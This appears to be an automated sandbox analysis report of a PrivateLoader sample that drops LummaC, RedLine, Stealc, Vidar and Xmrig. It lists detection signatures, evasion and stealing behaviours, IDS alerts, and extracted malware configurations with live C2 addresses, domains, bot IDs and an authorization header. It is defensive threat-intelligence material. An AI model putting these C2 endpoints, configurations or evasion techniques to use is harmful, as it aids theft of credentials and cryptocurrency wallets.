Windows Analysis Report
gobEmOm5sr.exe

Overview

General Information

Sample name: gobEmOm5sr.exe
(renamed because the original name is a hash value)
Original sample name: 1F389EF6DAC9971FEF4BAD14B3514C26.exe
Analysis ID: 1505384
MD5: 1f389ef6dac9971fef4bad14b3514c26
SHA1: 47e2bfe623d17b4272958a1546dc459695d6d134
SHA256: 65e67f728f8f7694f68156ad4ed80825739968701ea1535291d489ef3dbebe06
Tags: exePrivateLoader
Infos:

Detection

LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Socks5Systemz
Yara detected Stealc
Yara detected Vidar
Yara detected Vidar stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and RedLine. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection

Source: stamppreewntnq.shop URL Reputation: Label: phishing
Source: condedqpwqm.shop URL Reputation: Label: phishing
Source: locatedblsoqp.shop URL Reputation: Label: phishing
Source: traineiwnqo.shop URL Reputation: Label: malware
Source: 0000000E.00000002.2120842089.00000000043E5000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": "147.45.47.36:30035", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
Source: 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199768374681", "https://t.me/edm0d", "https://t.me/fneogr"], "Botnet": "4f1093aa7eebaf755203a00370e22375"}
Source: 42.2.BitLockerToGo.exe.400000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["stamppreewntnq.shop", "evoliutwoqm.shop", "locatedblsoqp.shop", "condedqpwqm.shop", "caffegclasiqwp.shop", "traineiwnqo.shop", "stagedchheiqwo.shop", "millyscroqwp.shop"], "Build id": "a8kafm--@cloudcosmic"}
Source: 31.2.RegAsm.exe.400000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://46.8.231.109/c4754d4f680ead72.php", "Botnet": "default"}
Source: file-link-iota.vercel.app Virustotal: Detection: 8% Perma Link
Source: 240902180529931.tyr.zont16.com Virustotal: Detection: 7% Perma Link
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe ReversingLabs: Detection: 79%
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Virustotal: Detection: 72% Perma Link
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe ReversingLabs: Detection: 87%
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe Virustotal: Detection: 74% Perma Link
Source: C:\Users\userDGHCBAAEHC.exe ReversingLabs: Detection: 54%
Source: C:\Users\userDGHCBAAEHC.exe Virustotal: Detection: 37% Perma Link
Source: C:\Users\userJJJJDAAECG.exe ReversingLabs: Detection: 26%
Source: C:\Users\userJJJJDAAECG.exe Virustotal: Detection: 38% Perma Link
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Virustotal: Detection: 72% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66c6fcb30b9dd_123p[1].exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66c6fcb30b9dd_123p[1].exe Virustotal: Detection: 74% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\install[1].exe Virustotal: Detection: 25% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lamp[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lamp[1].exe Virustotal: Detection: 39% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sgnr[1].exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sgnr[1].exe Virustotal: Detection: 37% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vjgg[1].exe ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vjgg[1].exe Virustotal: Detection: 37% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66d59ef9d4404_premium[1].exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66d59ef9d4404_premium[1].exe Virustotal: Detection: 67% Perma Link
Source: gobEmOm5sr.exe ReversingLabs: Detection: 55%
Source: gobEmOm5sr.exe Virustotal: Detection: 53% Perma Link
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\userJJJJDAAECG.exe Joe Sandbox ML: detected
Source: C:\ProgramData\DB Light Pack Engine 9.6.45\DB Light Pack Engine 9.6.45.exe Joe Sandbox ML: detected
Source: C:\Users\userDGHCBAAEHC.exe Joe Sandbox ML: detected
Source: gobEmOm5sr.exe Joe Sandbox ML: detected
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: caffegclasiqwp.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: stamppreewntnq.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: stagedchheiqwo.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: millyscroqwp.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: evoliutwoqm.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: condedqpwqm.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: traineiwnqo.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: locatedblsoqp.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: stamppreewntnq.shop
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String decryptor: a8kafm--@cloudcosmic

Bitcoin Miner

Source: Yara match File source: sslproxydump.pcap, type: PCAP

Compliance

Source: C:\Users\user\AppData\Local\NewStar\newstar.exe Unpacked PE file: 39.2.newstar.exe.400000.0.unpack
Source: gobEmOm5sr.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewStar_is1
Source: unknown HTTPS traffic detected: 173.231.16.77:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 76.76.21.142:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 158.69.225.124:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.2.46:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: gobEmOm5sr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\symbols\exe\premium_gitrep.pdbe source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001207000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdb source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001934000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdbG source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2332767463.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000000.1923341342.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.PDBf1 source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n<C:\Windows\premium_gitrep.pdb source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2233127778.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: PE.pdb source: gobEmOm5sr.exe, 00000000.00000002.1663150655.0000000005790000.00000004.08000000.00040000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001934000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\wMwlL.pdb source: gobEmOm5sr.exe, 00000000.00000002.1663531403.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: premium_gitrep.pdb source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000000.1922223189.00000000007C2000.00000002.00000001.01000000.0000000A.sdmp, yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001256000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000158E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\premium_gitrep.pdbFk<W source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001207000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000153D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: premium_gitrep.pdbx source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000000.1922223189.00000000007C2000.00000002.00000001.01000000.0000000A.sdmp, yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001256000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: githubsoft.pdb source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: mscorlib.resources.pdbV source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001207000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BotClient.pdb source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000000.1922131393.0000000000282000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: ud.pdbWindowsPowerShell\Modules;C:\Windows\system32\WindowsPowe source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000158E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 0dows\symbols\dll\mscorlib.pdb source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.00000000011F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\newPrime_cloud.pdbN source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdb source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2332767463.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: githubsoft.pdb8 source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: n<C:\Windows\newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2221433328.00000000012F9000.00000004.00000010.00020000.00000000.sdmp
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Network traffic Suricata IDS: 2054709 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (GET) : 192.168.2.4:49730 -> 185.143.223.148:80
Source: Network traffic Suricata IDS: 2054710 - Severity 1 - ET MALWARE PrivateLoader CnC Response : 185.143.223.148:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2054711 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (POST) : 192.168.2.4:49730 -> 185.143.223.148:80
Source: Network traffic Suricata IDS: 2046266 - Severity 1 - ET MALWARE [ANY.RUN] RisePro TCP (Token) : 77.105.164.24:50505 -> 192.168.2.4:49754
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49753 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49753 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.4:49753
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49753 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.4:49753
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49753 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2046269 - Severity 1 - ET MALWARE [ANY.RUN] RisePro TCP (Activity) : 192.168.2.4:49754 -> 77.105.164.24:50505
Source: Network traffic Suricata IDS: 2049060 - Severity 1 - ET MALWARE RisePro TCP Heartbeat Packet : 192.168.2.4:49754 -> 77.105.164.24:50505
Source: Network traffic Suricata IDS: 2055482 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop) : 192.168.2.4:49325 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.4:49760 -> 147.45.47.36:30035
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.4:49760 -> 147.45.47.36:30035
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 147.45.47.36:30035 -> 192.168.2.4:49760
Source: Network traffic Suricata IDS: 2055492 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (stamppreewntnq .shop) : 192.168.2.4:49762 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.4:56325 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.4:59406 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055475 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop) : 192.168.2.4:55687 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49764 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 147.45.47.36:30035 -> 192.168.2.4:49760
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49766 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49768 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49771 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.4:53819 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.4:55415 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49779 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49778 -> 147.45.126.10:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49781 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.126.10:80 -> 192.168.2.4:49778
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49781 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.126.10:80 -> 192.168.2.4:49778
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.100:80 -> 192.168.2.4:49781
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49781 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.100:80 -> 192.168.2.4:49781
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49781 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49780 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.4:52984 -> 1.1.1.1:53
